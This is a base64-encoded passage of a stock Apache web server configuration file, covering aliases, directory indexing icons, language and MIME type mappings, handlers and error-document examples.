c2VydmVyLWdlbmVyYXRlZCBwYWdlcyAoZXJyb3IgZG9jdW1lbnRzLCBGVFAgZGlyZWN0b3J5IGxp c3RpbmdzLAojIG1vZF9zdGF0dXMgYW5kIG1vZF9pbmZvIG91dHB1dCBldGMuLCBidXQgbm90IENH SSBnZW5lcmF0ZWQgZG9jdW1lbnRzKS4KIyBTZXQgdG8gIkVNYWlsIiB0byBhbHNvIGluY2x1ZGUg YSBtYWlsdG86IGxpbmsgdG8gdGhlIFNlcnZlckFkbWluLgojIFNldCB0byBvbmUgb2Y6ICBPbiB8 IE9mZiB8IEVNYWlsCiMKU2VydmVyU2lnbmF0dXJlIE9uCgojIEVCQ0RJQyBjb25maWd1cmF0aW9u OgojIChvbmx5IGZvciBtYWluZnJhbWVzIHVzaW5nIHRoZSBFQkNESUMgY29kZXNldCwgY3VycmVu dGx5IG9uZSBvZjoKIyBGdWppdHN1LVNpZW1lbnMnIEJTMjAwMC9PU0QsIElCTSdzIE9TLzM5MCBh bmQgSUJNJ3MgVFBGKSEhCiMgVGhlIGZvbGxvd2luZyBkZWZhdWx0IGNvbmZpZ3VyYXRpb24gYXNz dW1lcyB0aGF0ICJ0ZXh0IGZpbGVzIgojIGFyZSBzdG9yZWQgaW4gRUJDRElDIChzbyB0aGF0IHlv dSBjYW4gb3BlcmF0ZSBvbiB0aGVtIHVzaW5nIHRoZQojIG5vcm1hbCBQT1NJWCB0b29scyBsaWtl IGdyZXAgYW5kIHNvcnQpIHdoaWxlICJiaW5hcnkgZmlsZXMiIGFyZQojIHN0b3JlZCB3aXRoIGlk ZW50aWNhbCBvY3RldHMgYXMgb24gYW4gQVNDSUkgbWFjaGluZS4KIwojIFRoZSBkaXJlY3RpdmVz IGFyZSBldmFsdWF0ZWQgaW4gY29uZmlndXJhdGlvbiBmaWxlIG9yZGVyLCB3aXRoCiMgdGhlIEVC Q0RJQ0NvbnZlcnQgZGlyZWN0aXZlcyBhcHBsaWVkIGJlZm9yZSBFQkNESUNDb252ZXJ0QnlUeXBl LgojCiMgSWYgeW91IHdhbnQgdG8gaGF2ZSBBU0NJSSBIVE1MIGRvY3VtZW50cyBhbmQgRUJDRElD IEhUTUwgZG9jdW1lbnRzCiMgYXQgdGhlIHNhbWUgdGltZSwgeW91IGNhbiB1c2UgdGhlIGZpbGUg ZXh0ZW5zaW9uIHRvIGZvcmNlCiMgY29udmVyc2lvbiBvZmYgZm9yIHRoZSBBU0NJSSBkb2N1bWVu dHM6CiMgPiBBZGRUeXBlICAgICAgIHRleHQvaHRtbCAuYWh0bWwKIyA+IEVCQ0RJQ0NvbnZlcnQg T2ZmPUluT3V0IC5haHRtbAojCiMgRUJDRElDQ29udmVydEJ5VHlwZSAgT249SW5PdXQgdGV4dC8q IG1lc3NhZ2UvKiBtdWx0aXBhcnQvKgojIEVCQ0RJQ0NvbnZlcnRCeVR5cGUgIE9uPUluICAgIGFw cGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZAojIEVCQ0RJQ0NvbnZlcnRCeVR5cGUgIE9u PUluT3V0IGFwcGxpY2F0aW9uL3Bvc3RzY3JpcHQgbW9kZWwvdnJtbAojIEVCQ0RJQ0NvbnZlcnRC eVR5cGUgT2ZmPUluT3V0ICovKgoKCiMKIyBBbGlhc2VzOiBBZGQgaGVyZSBhcyBtYW55IGFsaWFz ZXMgYXMgeW91IG5lZWQgKHdpdGggbm8gbGltaXQpLiBUaGUgZm9ybWF0IGlzIAojIEFsaWFzIGZh a2VuYW1lIHJlYWxuYW1lCiMKPElmTW9kdWxlIG1vZF9hbGlhcy5jPgoKICAgICMKICAgICMgTm90 ZSB0aGF0IGlmIHlvdSBpbmNsdWRlIGEgdHJhaWxpbmcgLyBvbiBmYWtlbmFtZSB0aGVuIHRoZSBz ZXJ2ZXIgd2lsbAogICAgIyByZXF1aXJlIGl0IHRvIGJlIHByZXNlbnQgaW4gdGhlIFVSTC4gIFNv ICIvaWNvbnMiIGlzbid0IGFsaWFzZWQgaW4gdGhpcwogICAgIyBleGFtcGxlLCBvbmx5ICIvaWNv bnMvIi4gIElmIHRoZSBmYWtlbmFtZSBpcyBzbGFzaC10ZXJtaW5hdGVkLCB0aGVuIHRoZSAKICAg ICMgcmVhbG5hbWUgbXVzdCBhbHNvIGJlIHNsYXNoIHRlcm1pbmF0ZWQsIGFuZCBpZiB0aGUgZmFr ZW5hbWUgb21pdHMgdGhlIAogICAgIyB0cmFpbGluZyBzbGFzaCwgdGhlIHJlYWxuYW1lIG11c3Qg YWxzbyBvbWl0IGl0LgogICAgIwogICAgQWxpYXMgL2ljb25zLyAiL3Zhci93d3cvaWNvbnMvIgoK ICAgIDxEaXJlY3RvcnkgIi92YXIvd3d3L2ljb25zIj4KICAgICAgICBPcHRpb25zIEluZGV4ZXMg TXVsdGlWaWV3cwogICAgICAgIEFsbG93T3ZlcnJpZGUgTm9uZQogICAgICAgIE9yZGVyIGFsbG93 LGRlbnkKICAgICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9EaXJlY3Rvcnk+CgogICAgIwogICAg IyBTY3JpcHRBbGlhczogVGhpcyBjb250cm9scyB3aGljaCBkaXJlY3RvcmllcyBjb250YWluIHNl cnZlciBzY3JpcHRzLgogICAgIyBTY3JpcHRBbGlhc2VzIGFyZSBlc3NlbnRpYWxseSB0aGUgc2Ft ZSBhcyBBbGlhc2VzLCBleGNlcHQgdGhhdAogICAgIyBkb2N1bWVudHMgaW4gdGhlIHJlYWxuYW1l IGRpcmVjdG9yeSBhcmUgdHJlYXRlZCBhcyBhcHBsaWNhdGlvbnMgYW5kCiAgICAjIHJ1biBieSB0 aGUgc2VydmVyIHdoZW4gcmVxdWVzdGVkIHJhdGhlciB0aGFuIGFzIGRvY3VtZW50cyBzZW50IHRv IHRoZSBjbGllbnQuCiAgICAjIFRoZSBzYW1lIHJ1bGVzIGFib3V0IHRyYWlsaW5nICIvIiBhcHBs eSB0byBTY3JpcHRBbGlhcyBkaXJlY3RpdmVzIGFzIHRvCiAgICAjIEFsaWFzLgogICAgIwogICAg U2NyaXB0QWxpYXMgL2NnaS1iaW4vICIvdmFyL3d3dy9jZ2ktYmluLyIKCiAgICAjCiAgICAjICIv dmFyL3d3dy9jZ2ktYmluIiBzaG91bGQgYmUgY2hhbmdlZCB0byB3aGF0ZXZlciB5b3VyIFNjcmlw dEFsaWFzZWQKICAgICMgQ0dJIGRpcmVjdG9yeSBleGlzdHMsIGlmIHlvdSBoYXZlIHRoYXQgY29u ZmlndXJlZC4KICAgICMKICAgIDxEaXJlY3RvcnkgIi92YXIvd3d3L2NnaS1iaW4iPgogICAgICAg IEFsbG93T3ZlcnJpZGUgTm9uZQogICAgICAgIE9wdGlvbnMgTm9uZQogICAgICAgIE9yZGVyIGFs bG93LGRlbnkKICAgICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9EaXJlY3Rvcnk+Cgo8L0lmTW9k dWxlPgojIEVuZCBvZiBhbGlhc2VzLgoKIwojIFJlZGlyZWN0IGFsbG93cyB5b3UgdG8gdGVsbCBj bGllbnRzIGFib3V0IGRvY3VtZW50cyB3aGljaCB1c2VkIHRvIGV4aXN0IGluCiMgeW91ciBzZXJ2 ZXIncyBuYW1lc3BhY2UsIGJ1dCBkbyBub3QgYW55bW9yZS4gVGhpcyBhbGxvd3MgeW91IHRvIHRl bGwgdGhlCiMgY2xpZW50cyB3aGVyZSB0byBsb29rIGZvciB0aGUgcmVsb2NhdGVkIGRvY3VtZW50 LgojIEZvcm1hdDogUmVkaXJlY3Qgb2xkLVVSSSBuZXctVVJMCiMKCiMKIyBEaXJlY3RpdmVzIGNv bnRyb2xsaW5nIHRoZSBkaXNwbGF5IG9mIHNlcnZlci1nZW5lcmF0ZWQgZGlyZWN0b3J5IGxpc3Rp bmdzLgojCjxJZk1vZHVsZSBtb2RfYXV0b2luZGV4LmM+CgogICAgIwogICAgIyBGYW5jeUluZGV4 aW5nIGlzIHdoZXRoZXIgeW91IHdhbnQgZmFuY3kgZGlyZWN0b3J5IGluZGV4aW5nIG9yIHN0YW5k YXJkCiAgICAjCiAgICBJbmRleE9wdGlvbnMgRmFuY3lJbmRleGluZyBOYW1lV2lkdGg9KgoKICAg ICMKICAgICMgQWRkSWNvbiogZGlyZWN0aXZlcyB0ZWxsIHRoZSBzZXJ2ZXIgd2hpY2ggaWNvbiB0 byBzaG93IGZvciBkaWZmZXJlbnQKICAgICMgZmlsZXMgb3IgZmlsZW5hbWUgZXh0ZW5zaW9ucy4g IFRoZXNlIGFyZSBvbmx5IGRpc3BsYXllZCBmb3IKICAgICMgRmFuY3lJbmRleGVkIGRpcmVjdG9y aWVzLgogICAgIwogICAgQWRkSWNvbkJ5RW5jb2RpbmcgKENNUCwvaWNvbnMvY29tcHJlc3NlZC5n aWYpIHgtY29tcHJlc3MgeC1nemlwCgogICAgQWRkSWNvbkJ5VHlwZSAoVFhULC9pY29ucy90ZXh0 LmdpZikgdGV4dC8qCiAgICBBZGRJY29uQnlUeXBlIChJTUcsL2ljb25zL2ltYWdlMi5naWYpIGlt YWdlLyoKICAgIEFkZEljb25CeVR5cGUgKFNORCwvaWNvbnMvc291bmQyLmdpZikgYXVkaW8vKgog ICAgQWRkSWNvbkJ5VHlwZSAoVklELC9pY29ucy9tb3ZpZS5naWYpIHZpZGVvLyoKCiAgICBBZGRJ Y29uIC9pY29ucy9iaW5hcnkuZ2lmIC5iaW4gLmV4ZQogICAgQWRkSWNvbiAvaWNvbnMvYmluaGV4 LmdpZiAuaHF4CiAgICBBZGRJY29uIC9pY29ucy90YXIuZ2lmIC50YXIKICAgIEFkZEljb24gL2lj b25zL3dvcmxkMi5naWYgLndybCAud3JsLmd6IC52cm1sIC52cm0gLml2CiAgICBBZGRJY29uIC9p Y29ucy9jb21wcmVzc2VkLmdpZiAuWiAueiAudGd6IC5neiAuemlwCiAgICBBZGRJY29uIC9pY29u cy9hLmdpZiAucHMgLmFpIC5lcHMKICAgIEFkZEljb24gL2ljb25zL2xheW91dC5naWYgLmh0bWwg LnNodG1sIC5odG0gLnBkZgogICAgQWRkSWNvbiAvaWNvbnMvdGV4dC5naWYgLnR4dAogICAgQWRk SWNvbiAvaWNvbnMvYy5naWYgLmMKICAgIEFkZEljb24gL2ljb25zL3AuZ2lmIC5wbCAucHkKICAg IEFkZEljb24gL2ljb25zL2YuZ2lmIC5mb3IKICAgIEFkZEljb24gL2ljb25zL2R2aS5naWYgLmR2 aQogICAgQWRkSWNvbiAvaWNvbnMvdXVlbmNvZGVkLmdpZiAudXUKICAgIEFkZEljb24gL2ljb25z L3NjcmlwdC5naWYgLmNvbmYgLnNoIC5zaGFyIC5jc2ggLmtzaCAudGNsCiAgICBBZGRJY29uIC9p Y29ucy90ZXguZ2lmIC50ZXgKICAgIEFkZEljb24gL2ljb25zL2JvbWIuZ2lmIGNvcmUKCiAgICBB ZGRJY29uIC9pY29ucy9iYWNrLmdpZiAuLgogICAgQWRkSWNvbiAvaWNvbnMvaGFuZC5yaWdodC5n aWYgUkVBRE1FCiAgICBBZGRJY29uIC9pY29ucy9mb2xkZXIuZ2lmIF5eRElSRUNUT1JZXl4KICAg IEFkZEljb24gL2ljb25zL2JsYW5rLmdpZiBeXkJMQU5LSUNPTl5eCgogICAgIwogICAgIyBEZWZh dWx0SWNvbiBpcyB3aGljaCBpY29uIHRvIHNob3cgZm9yIGZpbGVzIHdoaWNoIGRvIG5vdCBoYXZl IGFuIGljb24KICAgICMgZXhwbGljaXRseSBzZXQuCiAgICAjCiAgICBEZWZhdWx0SWNvbiAvaWNv bnMvdW5rbm93bi5naWYKCiAgICAjCiAgICAjIEFkZERlc2NyaXB0aW9uIGFsbG93cyB5b3UgdG8g cGxhY2UgYSBzaG9ydCBkZXNjcmlwdGlvbiBhZnRlciBhIGZpbGUgaW4KICAgICMgc2VydmVyLWdl bmVyYXRlZCBpbmRleGVzLiAgVGhlc2UgYXJlIG9ubHkgZGlzcGxheWVkIGZvciBGYW5jeUluZGV4 ZWQKICAgICMgZGlyZWN0b3JpZXMuCiAgICAjIEZvcm1hdDogQWRkRGVzY3JpcHRpb24gImRlc2Ny aXB0aW9uIiBmaWxlbmFtZQogICAgIwogICAgI0FkZERlc2NyaXB0aW9uICJHWklQIGNvbXByZXNz ZWQgZG9jdW1lbnQiIC5negogICAgI0FkZERlc2NyaXB0aW9uICJ0YXIgYXJjaGl2ZSIgLnRhcgog ICAgI0FkZERlc2NyaXB0aW9uICJHWklQIGNvbXByZXNzZWQgdGFyIGFyY2hpdmUiIC50Z3oKCiAg ICAjCiAgICAjIFJlYWRtZU5hbWUgaXMgdGhlIG5hbWUgb2YgdGhlIFJFQURNRSBmaWxlIHRoZSBz ZXJ2ZXIgd2lsbCBsb29rIGZvciBieQogICAgIyBkZWZhdWx0LCBhbmQgYXBwZW5kIHRvIGRpcmVj dG9yeSBsaXN0aW5ncy4KICAgICMKICAgICMgSGVhZGVyTmFtZSBpcyB0aGUgbmFtZSBvZiBhIGZp bGUgd2hpY2ggc2hvdWxkIGJlIHByZXBlbmRlZCB0bwogICAgIyBkaXJlY3RvcnkgaW5kZXhlcy4g CiAgICAjCiAgICAjIElmIE11bHRpVmlld3MgYXJlIGFtb25nc3QgdGhlIE9wdGlvbnMgaW4gZWZm ZWN0LCB0aGUgc2VydmVyIHdpbGwKICAgICMgZmlyc3QgbG9vayBmb3IgbmFtZS5odG1sIGFuZCBp bmNsdWRlIGl0IGlmIGZvdW5kLiAgSWYgbmFtZS5odG1sCiAgICAjIGRvZXNuJ3QgZXhpc3QsIHRo ZSBzZXJ2ZXIgd2lsbCB0aGVuIGxvb2sgZm9yIG5hbWUudHh0IGFuZCBpbmNsdWRlCiAgICAjIGl0 IGFzIHBsYWludGV4dCBpZiBmb3VuZC4KICAgICMKICAgIFJlYWRtZU5hbWUgUkVBRE1FCiAgICBI ZWFkZXJOYW1lIEhFQURFUgoKICAgICMKICAgICMgSW5kZXhJZ25vcmUgaXMgYSBzZXQgb2YgZmls ZW5hbWVzIHdoaWNoIGRpcmVjdG9yeSBpbmRleGluZyBzaG91bGQgaWdub3JlCiAgICAjIGFuZCBu b3QgaW5jbHVkZSBpbiB0aGUgbGlzdGluZy4gIFNoZWxsLXN0eWxlIHdpbGRjYXJkaW5nIGlzIHBl cm1pdHRlZC4KICAgICMKICAgIEluZGV4SWdub3JlIC4/PyogKn4gKiMgSEVBREVSKiBSRUFETUUq IFJDUyBDVlMgKix2ICosdAoKPC9JZk1vZHVsZT4KIyBFbmQgb2YgaW5kZXhpbmcgZGlyZWN0aXZl cy4KCiMKIyBEb2N1bWVudCB0eXBlcy4KIwo8SWZNb2R1bGUgbW9kX21pbWUuYz4KCiAgICAjCiAg ICAjIEFkZEVuY29kaW5nIGFsbG93cyB5b3UgdG8gaGF2ZSBjZXJ0YWluIGJyb3dzZXJzIChNb3Nh aWMvWCAyLjErKSB1bmNvbXByZXNzCiAgICAjIGluZm9ybWF0aW9uIG9uIHRoZSBmbHkuIE5vdGU6 IE5vdCBhbGwgYnJvd3NlcnMgc3VwcG9ydCB0aGlzLgogICAgIyBEZXNwaXRlIHRoZSBuYW1lIHNp bWlsYXJpdHksIHRoZSBmb2xsb3dpbmcgQWRkKiBkaXJlY3RpdmVzIGhhdmUgbm90aGluZwogICAg IyB0byBkbyB3aXRoIHRoZSBGYW5jeUluZGV4aW5nIGN1c3RvbWl6YXRpb24gZGlyZWN0aXZlcyBh Ym92ZS4KICAgICMKICAgIEFkZEVuY29kaW5nIHgtY29tcHJlc3MgWgogICAgQWRkRW5jb2Rpbmcg eC1nemlwIGd6IHRnegoKICAgICMKICAgICMgQWRkTGFuZ3VhZ2UgYWxsb3dzIHlvdSB0byBzcGVj aWZ5IHRoZSBsYW5ndWFnZSBvZiBhIGRvY3VtZW50LiBZb3UgY2FuCiAgICAjIHRoZW4gdXNlIGNv bnRlbnQgbmVnb3RpYXRpb24gdG8gZ2l2ZSBhIGJyb3dzZXIgYSBmaWxlIGluIGEgbGFuZ3VhZ2UK ICAgICMgaXQgY2FuIHVuZGVyc3RhbmQuICAKICAgICMKICAgICMgTm90ZSAxOiBUaGUgc3VmZml4 IGRvZXMgbm90IGhhdmUgdG8gYmUgdGhlIHNhbWUgYXMgdGhlIGxhbmd1YWdlIAogICAgIyBrZXl3 b3JkIC0tLSB0aG9zZSB3aXRoIGRvY3VtZW50cyBpbiBQb2xpc2ggKHdob3NlIG5ldC1zdGFuZGFy ZCAKICAgICMgbGFuZ3VhZ2UgY29kZSBpcyBwbCkgbWF5IHdpc2ggdG8gdXNlICJBZGRMYW5ndWFn ZSBwbCAucG8iIHRvIAogICAgIyBhdm9pZCB0aGUgYW1iaWd1aXR5IHdpdGggdGhlIGNvbW1vbiBz dWZmaXggZm9yIHBlcmwgc2NyaXB0cy4KICAgICMKICAgICMgTm90ZSAyOiBUaGUgZXhhbXBsZSBl bnRyaWVzIGJlbG93IGlsbHVzdHJhdGUgdGhhdCBpbiBxdWl0ZQogICAgIyBzb21lIGNhc2VzIHRo ZSB0d28gY2hhcmFjdGVyICdMYW5ndWFnZScgYWJicmV2aWF0aW9uIGlzIG5vdAogICAgIyBpZGVu dGljYWwgdG8gdGhlIHR3byBjaGFyYWN0ZXIgJ0NvdW50cnknIGNvZGUgZm9yIGl0cyBjb3VudHJ5 LAogICAgIyBFLmcuICdEYW5tYXJrL2RrJyB2ZXJzdXMgJ0RhbmlzaC9kYScuCiAgICAjCiAgICAj IE5vdGUgMzogSW4gdGhlIGNhc2Ugb2YgJ2x0eicgd2UgdmlvbGF0ZSB0aGUgUkZDIGJ5IHVzaW5n IGEgdGhyZWUgY2hhciAKICAgICMgc3BlY2lmaWVyLiBCdXQgdGhlcmUgaXMgJ3dvcmsgaW4gcHJv Z3Jlc3MnIHRvIGZpeCB0aGlzIGFuZCBnZXQgCiAgICAjIHRoZSByZWZlcmVuY2UgZGF0YSBmb3Ig cmZjMTc2NiBjbGVhbmVkIHVwLgogICAgIwogICAgIyBEYW5pc2ggKGRhKSAtIER1dGNoIChubCkg LSBFbmdsaXNoIChlbikgLSBFc3RvbmlhbiAoZWUpCiAgICAjIEZyZW5jaCAoZnIpIC0gR2VybWFu IChkZSkgLSBHcmVlay1Nb2Rlcm4gKGVsKQogICAgIyBJdGFsaWFuIChpdCkgLSBLb3JlYW4gKGty KSAtIE5vcndlZ2lhbiAobm8pCiAgICAjIFBvcnR1Z2VzZSAocHQpIC0gTHV4ZW1ib3VyZ2VvaXMq IChsdHopCiAgICAjIFNwYW5pc2ggKGVzKSAtIFN3ZWRpc2ggKHN2KSAtIENhdGFsYW4gKGNhKSAt IEN6ZWNoKGN6KQogICAgIyBQb2xpc2ggKHBsKSAtIEJyYXppbGlhbiBQb3J0dWd1ZXNlIChwdC1i cikgLSBKYXBhbmVzZSAoamEpCiAgICAjIFJ1c3NpYW4gKHJ1KQogICAgIwogICAgQWRkTGFuZ3Vh Z2UgZGEgLmRrCiAgICBBZGRMYW5ndWFnZSBubCAubmwKICAgIEFkZExhbmd1YWdlIGVuIC5lbgog ICAgQWRkTGFuZ3VhZ2UgZXQgLmVlCiAgICBBZGRMYW5ndWFnZSBmciAuZnIKICAgIEFkZExhbmd1 YWdlIGRlIC5kZQogICAgQWRkTGFuZ3VhZ2UgZWwgLmVsCiAgICBBZGRMYW5ndWFnZSBoZSAuaGUK ICAgIEFkZENoYXJzZXQgSVNPLTg4NTktOCAuaXNvODg1OS04CiAgICBBZGRMYW5ndWFnZSBpdCAu aXQKICAgIEFkZExhbmd1YWdlIGphIC5qYQogICAgQWRkQ2hhcnNldCBJU08tMjAyMi1KUCAuamlz CiAgICBBZGRMYW5ndWFnZSBrciAua3IKICAgIEFkZENoYXJzZXQgSVNPLTIwMjItS1IgLmlzby1r cgogICAgQWRkTGFuZ3VhZ2Ugbm8gLm5vCiAgICBBZGRMYW5ndWFnZSBwbCAucG8KICAgIEFkZENo YXJzZXQgSVNPLTg4NTktMiAuaXNvLXBsCiAgICBBZGRMYW5ndWFnZSBwdCAucHQKICAgIEFkZExh bmd1YWdlIHB0LWJyIC5wdC1icgogICAgQWRkTGFuZ3VhZ2UgbHR6IC5sdQogICAgQWRkTGFuZ3Vh Z2UgY2EgLmNhCiAgICBBZGRMYW5ndWFnZSBlcyAuZXMKICAgIEFkZExhbmd1YWdlIHN2IC5zZQog ICAgQWRkTGFuZ3VhZ2UgY3ogLmN6CiAgICBBZGRMYW5ndWFnZSBydSAucnUKICAgIEFkZExhbmd1 YWdlIHpoLXR3IC50dwogICAgQWRkTGFuZ3VhZ2UgdHcgLnR3CiAgICBBZGRDaGFyc2V0IEJpZzUg ICAgICAgICAuQmlnNSAgICAuYmlnNQogICAgQWRkQ2hhcnNldCBXSU5ET1dTLTEyNTEgLmNwLTEy NTEKICAgIEFkZENoYXJzZXQgQ1A4NjYgICAgICAgIC5jcDg2NgogICAgQWRkQ2hhcnNldCBJU08t ODg1OS01ICAgLmlzby1ydQogICAgQWRkQ2hhcnNldCBLT0k4LVIgICAgICAgLmtvaTgtcgogICAg QWRkQ2hhcnNldCBVQ1MtMiAgICAgICAgLnVjczIKICAgIEFkZENoYXJzZXQgVUNTLTQgICAgICAg IC51Y3M0CiAgICBBZGRDaGFyc2V0IFVURi04ICAgICAgICAudXRmOAoKICAgICMgTGFuZ3VhZ2VQ cmlvcml0eSBhbGxvd3MgeW91IHRvIGdpdmUgcHJlY2VkZW5jZSB0byBzb21lIGxhbmd1YWdlcwog ICAgIyBpbiBjYXNlIG9mIGEgdGllIGR1cmluZyBjb250ZW50IG5lZ290aWF0aW9uLgogICAgIwog ICAgIyBKdXN0IGxpc3QgdGhlIGxhbmd1YWdlcyBpbiBkZWNyZWFzaW5nIG9yZGVyIG9mIHByZWZl cmVuY2UuIFdlIGhhdmUKICAgICMgbW9yZSBvciBsZXNzIGFscGhhYmV0aXplZCB0aGVtIGhlcmUu IFlvdSBwcm9iYWJseSB3YW50IHRvIGNoYW5nZSB0aGlzLgogICAgIwogICAgPElmTW9kdWxlIG1v ZF9uZWdvdGlhdGlvbi5jPgogICAgICAgIExhbmd1YWdlUHJpb3JpdHkgZW4gZGEgbmwgZXQgZnIg ZGUgZWwgaXQgamEga3Igbm8gcGwgcHQgcHQtYnIgcnUgbHR6IGNhIGVzIHN2IHR3CiAgICA8L0lm TW9kdWxlPgoKICAgICMKICAgICMgQWRkVHlwZSBhbGxvd3MgeW91IHRvIHR3ZWFrIG1pbWUudHlw ZXMgd2l0aG91dCBhY3R1YWxseSBlZGl0aW5nIGl0LCBvciB0bwogICAgIyBtYWtlIGNlcnRhaW4g ZmlsZXMgdG8gYmUgY2VydGFpbiB0eXBlcy4KICAgICMKICAgICMgRm9yIGV4YW1wbGUsIHRoZSBQ SFAgMy54IG1vZHVsZSAobm90IHBhcnQgb2YgdGhlIEFwYWNoZSBkaXN0cmlidXRpb24gLSBzZWUK ICAgICMgaHR0cDovL3d3dy5waHAubmV0KSB3aWxsIHR5cGljYWxseSB1c2U6CiAgICAjCiAgICA8 SWZNb2R1bGUgbW9kX3BocDMuYz4KICAgICAgICBBZGRUeXBlIGFwcGxpY2F0aW9uL3gtaHR0cGQt cGhwMyAucGhwMwogICAgICAgIEFkZFR5cGUgYXBwbGljYXRpb24veC1odHRwZC1waHAzLXNvdXJj ZSAucGhwcwogICAgPC9JZk1vZHVsZT4KICAgICMKICAgICMgQW5kIGZvciBQSFAgNC54LCB1c2U6 CiAgICAjCiAgICA8SWZNb2R1bGUgbW9kX3BocDQuYz4KICAgICAgICBBZGRUeXBlIGFwcGxpY2F0 aW9uL3gtaHR0cGQtcGhwIC5waHAgLnBocDQgLnBocDMgLnBodG1sCiAgICAgICAgQWRkVHlwZSBh cHBsaWNhdGlvbi94LWh0dHBkLXBocC1zb3VyY2UgLnBocHMKICAgIDwvSWZNb2R1bGU+CgogICAg IwogICAgIyBGb3IgUEhQL0ZJIChQSFAyKSwgdXNlOgogICAgIwogICAgPElmTW9kdWxlIG1vZF9w aHAuYz4KICAgICAgICBBZGRUeXBlIGFwcGxpY2F0aW9uL3gtaHR0cGQtcGhwIC5waHRtbAogICAg PC9JZk1vZHVsZT4KCiAgICBBZGRUeXBlIGFwcGxpY2F0aW9uL3gtdGFyIC50Z3oKCiAgICAjCiAg ICAjIEFkZEhhbmRsZXIgYWxsb3dzIHlvdSB0byBtYXAgY2VydGFpbiBmaWxlIGV4dGVuc2lvbnMg dG8gImhhbmRsZXJzIiwKICAgICMgYWN0aW9ucyB1bnJlbGF0ZWQgdG8gZmlsZXR5cGUuIFRoZXNl IGNhbiBiZSBlaXRoZXIgYnVpbHQgaW50byB0aGUgc2VydmVyCiAgICAjIG9yIGFkZGVkIHdpdGgg dGhlIEFjdGlvbiBjb21tYW5kIChzZWUgYmVsb3cpCiAgICAjCiAgICAjIElmIHlvdSB3YW50IHRv IHVzZSBzZXJ2ZXIgc2lkZSBpbmNsdWRlcywgb3IgQ0dJIG91dHNpZGUKICAgICMgU2NyaXB0QWxp YXNlZCBkaXJlY3RvcmllcywgdW5jb21tZW50IHRoZSBmb2xsb3dpbmcgbGluZXMuCiAgICAjCiAg ICAjIFRvIHVzZSBDR0kgc2NyaXB0czoKICAgICMKICAgICNBZGRIYW5kbGVyIGNnaS1zY3JpcHQg LmNnaQoKICAgICMKICAgICMgVG8gdXNlIHNlcnZlci1wYXJzZWQgSFRNTCBmaWxlcwogICAgIwog ICAgQWRkVHlwZSB0ZXh0L2h0bWwgLnNodG1sCiAgICBBZGRIYW5kbGVyIHNlcnZlci1wYXJzZWQg LnNodG1sCgogICAgIwogICAgIyBVbmNvbW1lbnQgdGhlIGZvbGxvd2luZyBsaW5lIHRvIGVuYWJs ZSBBcGFjaGUncyBzZW5kLWFzaXMgSFRUUCBmaWxlCiAgICAjIGZlYXR1cmUKICAgICMKICAgICNB ZGRIYW5kbGVyIHNlbmQtYXMtaXMgYXNpcwoKICAgICMKICAgICMgSWYgeW91IHdpc2ggdG8gdXNl IHNlcnZlci1wYXJzZWQgaW1hZ2VtYXAgZmlsZXMsIHVzZQogICAgIwogICAgQWRkSGFuZGxlciBp bWFwLWZpbGUgbWFwCgogICAgIwogICAgIyBUbyBlbmFibGUgdHlwZSBtYXBzLCB5b3UgbWlnaHQg d2FudCB0byB1c2UKICAgICMKICAgICNBZGRIYW5kbGVyIHR5cGUtbWFwIHZhcgoKPC9JZk1vZHVs ZT4KIyBFbmQgb2YgZG9jdW1lbnQgdHlwZXMuCgojCiMgQWN0aW9uIGxldHMgeW91IGRlZmluZSBt ZWRpYSB0eXBlcyB0aGF0IHdpbGwgZXhlY3V0ZSBhIHNjcmlwdCB3aGVuZXZlcgojIGEgbWF0Y2hp bmcgZmlsZSBpcyBjYWxsZWQuIFRoaXMgZWxpbWluYXRlcyB0aGUgbmVlZCBmb3IgcmVwZWF0ZWQg VVJMCiMgcGF0aG5hbWVzIGZvciBvZnQtdXNlZCBDR0kgZmlsZSBwcm9jZXNzb3JzLgojIEZvcm1h dDogQWN0aW9uIG1lZGlhL3R5cGUgL2NnaS1zY3JpcHQvbG9jYXRpb24KIyBGb3JtYXQ6IEFjdGlv biBoYW5kbGVyLW5hbWUgL2NnaS1zY3JpcHQvbG9jYXRpb24KIwoKIwojIE1ldGFEaXI6IHNwZWNp ZmllcyB0aGUgbmFtZSBvZiB0aGUgZGlyZWN0b3J5IGluIHdoaWNoIEFwYWNoZSBjYW4gZmluZAoj IG1ldGEgaW5mb3JtYXRpb24gZmlsZXMuIFRoZXNlIGZpbGVzIGNvbnRhaW4gYWRkaXRpb25hbCBI VFRQIGhlYWRlcnMKIyB0byBpbmNsdWRlIHdoZW4gc2VuZGluZyB0aGUgZG9jdW1lbnQKIwojTWV0 YURpciAud2ViCgojCiMgTWV0YVN1ZmZpeDogc3BlY2lmaWVzIHRoZSBmaWxlIG5hbWUgc3VmZml4 IGZvciB0aGUgZmlsZSBjb250YWluaW5nIHRoZQojIG1ldGEgaW5mb3JtYXRpb24uCiMKI01ldGFT dWZmaXggLm1ldGEKCiMKIyBDdXN0b21pemFibGUgZXJyb3IgcmVzcG9uc2UgKEFwYWNoZSBzdHls ZSkKIyAgdGhlc2UgY29tZSBpbiB0aHJlZSBmbGF2b3JzCiMKIyAgICAxKSBwbGFpbiB0ZXh0CiNF cnJvckRvY3VtZW50IDUwMCAiVGhlIHNlcnZlciBtYWRlIGEgYm9vIGJvby4KIyAgbi5iLiAgdGhl IHNpbmdsZSBsZWFkaW5nICgiKSBtYXJrcyBpdCBhcyB0ZXh0LCBpdCBkb2VzIG5vdCBnZXQgb3V0 cHV0CiMKIyAgICAyKSBsb2NhbCByZWRpcmVjdHMKI0Vycm9yRG9jdW1lbnQgNDA0IC9taXNzaW5n Lmh0bWwKIyAgdG8gcmVkaXJlY3QgdG8gbG9jYWwgVVJMIC9taXNzaW5nLmh0bWwKI0Vycm9yRG9j dW1lbnQgNDA0IC9jZ2ktYmluL21pc3NpbmdfaGFuZGxlci5wbAojICBOLkIuOiBZb3UgY2FuIHJl ZGlyZWN0IHRvIGEgc2NyaXB0IG9yIGEgZG9jdW1lbnQgdXNpbmcgc2VydmVyLXNpZGUtaW5jbHVk ZXMuCiMKIyAgICAzKSBleHRlcm5hbCByZWRpcmVjdHMKI0Vycm9yRG9jdW1lbnQgNDAyIGh0dHA6 Ly9zb21lLm90aGVyX3NlcnZlci5jb20vc3Vic2NyaXB0aW9uX2luZm8uaHRtbAojICBOLkIuOiBN YW55IG9mIHRoZSBlbnZpcm9ubWVudCB2YXJpYWJsZXMgYXNzb2NpYXRlZCB3aXRoIHRoZSBvcmln 